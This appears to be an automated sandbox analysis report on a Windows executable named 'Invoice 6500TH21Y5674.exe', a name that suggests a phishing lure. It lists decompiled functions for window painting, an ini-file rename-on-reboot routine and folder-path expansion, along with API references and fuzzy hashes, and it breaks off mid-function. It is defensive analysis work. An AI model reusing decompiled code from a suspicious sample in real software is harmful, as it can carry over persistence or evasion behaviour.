0x00404517
0x00000000
0x0040451b
0x004044e3
0x00404403
0x00000000
0x00404417
0x0040441d
0x00404423
0x00000000
0x00000000
0x00404448
0x0040444a
0x0040444f
0x00000000
0x0040444f
0x00404403
0x004042d9
0x004042dc
0x004042e1
0x004042f2
0x004042f2
0x004042f9
0x004042fc
0x004042fe
0x00404303
0x0040430c
0x00404312
0x0040431e
0x00404321
0x0040432a
0x0040432f
0x00404332
0x00404337
0x0040434e
0x00404355
0x00404368
0x0040436b
0x00404380
0x00404387
0x0040438c
0x00404391
0x00404391
0x004043a0
0x004043af
0x004043c1
0x004043c6
0x004043d6
0x004043d8
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040434E
GetDlgItem.USER32 ref: 00404362
SendMessageA.USER32 ref: 00404380
GetSysColor.USER32(?), ref: 00404391
SendMessageA.USER32 ref: 004043A0
SendMessageA.USER32 ref: 004043AF
lstrlenA.KERNEL32(?), ref: 004043B2
SendMessageA.USER32 ref: 004043C1
SendMessageA.USER32 ref: 004043D6
GetDlgItem.USER32 ref: 00404438
SendMessageA.USER32 ref: 0040443B
GetDlgItem.USER32 ref: 00404466
SendMessageA.USER32 ref: 004044A6
LoadCursorA.USER32 ref: 004044B5
SetCursor.USER32(00000000), ref: 004044BE
LoadCursorA.USER32 ref: 004044D4
SetCursor.USER32(00000000), ref: 004044D7
SendMessageA.USER32 ref: 00404503
SendMessageA.USER32 ref: 00404517

Strings

N, xrefs: 00404454

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f74;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2760, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f68;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,007A2760,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D43, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D43(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a12f8 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7a16f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a0ef8, "%s=%s\r\n", 0x7a12f8, 0x7a16f8);
						_t53 = _t52 + 0x10;
						E00406167(_t37, 0x400, 0x7a16f8, 0x7a16f8,  *((intOrPtr*)( *0x7a2f74 + 0x128)));
						_t12 = E00405C6D(0x7a16f8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405CE5(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405BD2(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405BD2(_t38, _t21 + 0xa, 0x40a3d8);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405C28(_t24 + _t46, 0x7a0ef8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405D14(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405C6D(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x7a12f8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405d43
0x00405d4c
0x00405d53
0x00405d67
0x00405d8f
0x00405d9a
0x00405d9e
0x00405dbe
0x00405dc5
0x00405dcf
0x00405ddc
0x00405de1
0x00405de6
0x00405dea
0x00405df9
0x00405dfb
0x00405e08
0x00405e0c
0x00405ea7
0x00000000
0x00405e22
0x00405e2f
0x00405e53
0x00405e57
0x00405e76
0x00405e7a
0x00405e7a
0x00405e7c
0x00405e85
0x00405e90
0x00405e9b
0x00405ea1
0x00000000
0x00405ea1
0x00405e59
0x00405e5c
0x00405e67
0x00405e63
0x00405e65
0x00405e66
0x00405e66
0x00405e6e
0x00405e70
0x00000000
0x00405e70
0x00405e3a
0x00405e40
0x00000000
0x00405e40
0x00405e0c
0x00405dea
0x00405d69
0x00405d74
0x00405d7d
0x00405d81
0x00000000
0x00000000
0x00405d81
0x00405eb2

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D

Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14

GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
wsprintfA.USER32 ref: 00405DB8
GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
GlobalFree.KERNEL32 ref: 00405EA1
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8

Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

Strings

%s=%s, xrefs: 00405DAE
[Rename], xrefs: 00405E22, 00405E34

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 61217faea5070430dba93366d5d1ba3c45b8a2833e6ad8f6ba82dc6a1e1a4478
Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
Opcode Fuzzy Hash: 61217faea5070430dba93366d5d1ba3c45b8a2833e6ad8f6ba82dc6a1e1a4478
Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406167, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406167(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t38 =  *( *0x7a273c - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x7a2fb8;
				_t39 = 0x7a1f00;
				_t90 = 0x7a1f00;
				if(_a4 >= 0x7a1f00 && _a4 - 0x7a1f00 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E00406167(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x7a1f00;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x7a4000;
							E004060D4(_t90, (_t97 << 0xa) + 0x7a4000);
						} else {
							E00406032(_t90,  *0x7a2f68);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063AF(_t90);
						}
						goto L42;
					}
					_t52 =  *0x7a2f6c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x7a3004;
						if( *0x7a3004 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x7a2f64;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x7a2f68,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x7a2f68,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FBB((_t80 & 0x0000003f) +  *0x7a2fb8, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x7a2fb8, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406167(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060D4(_a4, _t39);
			}

0x00406167
0x00406167
0x00406167
0x0040616d
0x00406172
0x00406183
0x00406183
0x0040618b
0x0040618c
0x0040618d
0x0040618e
0x00406191
0x00406199
0x0040619b
0x004061b2
0x004061b5
0x004061b5
0x0040638c
0x0040638c
0x00406390
0x00000000
0x00000000
0x004061c2
0x004061c8
0x00000000
0x00000000
0x004061ce
0x004061cf
0x004061d2
0x004061d5
0x0040637f
0x00406389
0x0040638b
0x0040638b
0x00406381
0x00406383
0x00406385
0x00406386
0x00406386
0x00000000
0x0040637f
0x004061db
0x004061df
0x004061ef
0x004061f6
0x004061f9
0x00406201
0x00406204
0x0040620b
0x0040620c
0x0040620f
0x0040632c
0x0040632f
0x0040635f
0x00406362
0x00406367
0x0040636b
0x0040636b
0x00406370
0x00406376
0x00406378
0x00000000
0x00406378
0x00406331
0x00406334
0x00406349
0x00406350
0x00406336
0x0040633d
0x0040633d
0x00406358
0x0040635b
0x00406324
0x00406325
0x00406325
0x00000000
0x0040635b
0x00406215
0x0040621c
0x0040621e
0x0040621f
0x00406239
0x00406239
0x00406240
0x00406240
0x00406247
0x0040624b
0x0040624b
0x0040624c
0x0040624e
0x00406287
0x0040628a
0x0040629a
0x0040629d
0x004062a5
0x004062ab
0x004062ab
0x0040630a
0x0040630a
0x0040630c
0x00000000
0x00000000
0x004062af
0x004062b6
0x004062b7
0x004062b9
0x004062d3
0x004062e1
0x004062e7
0x004062e9
0x00406307
0x00406307
0x00406307
0x00000000
0x00406307
0x004062ef
0x004062f8
0x004062fb
0x00406301
0x00406305
0x00000000
0x00000000
0x00000000
0x00406305
0x004062bb
0x004062be
0x00000000
0x00000000
0x004062cd
0x004062cf
0x004062d1
0x00000000
0x00000000
0x00000000
0x004062d1
0x00000000
0x0040630a
0x00406292
0x00000000
0x00406250
0x0040626b
0x00406270
0x00406273
0x00406313
0x00406313
0x00406317
0x0040631f
0x0040631f
0x00000000
0x00406317
0x0040627d
0x0040630e
0x0040630e
0x00406311
0x00000000
0x00000000
0x00000000
0x00406311
0x0040624e
0x00406221
0x00406225
0x00000000
0x00000000
0x00406227
0x0040622b
0x00000000
0x00000000
0x0040622d
0x00406231
0x00000000
0x00406233
0x00406233
0x00000000
0x00406233
0x00406231
0x00406396
0x004063a0
0x004063ac
0x004063ac
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(007A1F00,00000400), ref: 00406292
GetWindowsDirectoryA.KERNEL32(007A1F00,00000400,?,0079ED48,00000000,00405233,0079ED48,00000000), ref: 004062A5
SHGetSpecialFolderLocation.SHELL32(00405233,73BCEA30,?,0079ED48,00000000,00405233,0079ED48,00000000), ref: 004062E1
SHGetPathFromIDListA.SHELL32(73BCEA30,007A1F00), ref: 004062EF
CoTaskMemFree.OLE32(73BCEA30), ref: 004062FB
lstrcatA.KERNEL32(007A1F00,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
lstrlenA.KERNEL32(007A1F00,?,0079ED48,00000000,00405233,0079ED48,00000000,00000000,00798F20,73BCEA30), ref: 00406371

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406319
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406261

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: 4a49ac3d45dd29d6e1b76d5fdd13ffd3c16fb6047165712eb687eb4b6aa95570
Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
Opcode Fuzzy Hash: 4a49ac3d45dd29d6e1b76d5fdd13ffd3c16fb6047165712eb687eb4b6aa95570
Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 004051FB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051FB(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2744;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7a3034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00406167(0, _t39, 0x79ed48, 0x79ed48, _a4);
					}
					_t26 = lstrlenA(0x79ed48);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7a2728, 0x79ed48);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x79ed48;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed48)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed48, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405201
0x0040520d
0x00405210
0x00405216
0x00405222
0x00405225
0x00405228
0x0040522e
0x0040522e
0x00405234
0x0040523c
0x0040523f
0x0040525c
0x00405260
0x00405269
0x00405269
0x00405273
0x0040527c
0x00405288
0x0040528f
0x00405293
0x00405296
0x004052a9
0x004052b7
0x004052b7
0x004052bb
0x004052bd
0x004052c0
0x00000000
0x004052c0
0x00405241
0x00405249
0x00405251
0x00405257
0x00000000
0x00405257
0x00405251
0x0040523f
0x004052ca

APIs

lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
SendMessageA.USER32 ref: 0040528F
SendMessageA.USER32 ref: 004052A9
SendMessageA.USER32 ref: 004052B7

Strings

Hy, xrefs: 0040521B

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Hy
API String ID: 2531174081-2517439931
Opcode ID: 05c6c48280d972a5241ed69f6299bcd720d19ae0d52461344edbf183de07e014
Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
Opcode Fuzzy Hash: 05c6c48280d972a5241ed69f6299bcd720d19ae0d52461344edbf183de07e014
Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98

Uniqueness

Uniqueness Score: -1.00%

Function 004063AF, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063AF(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
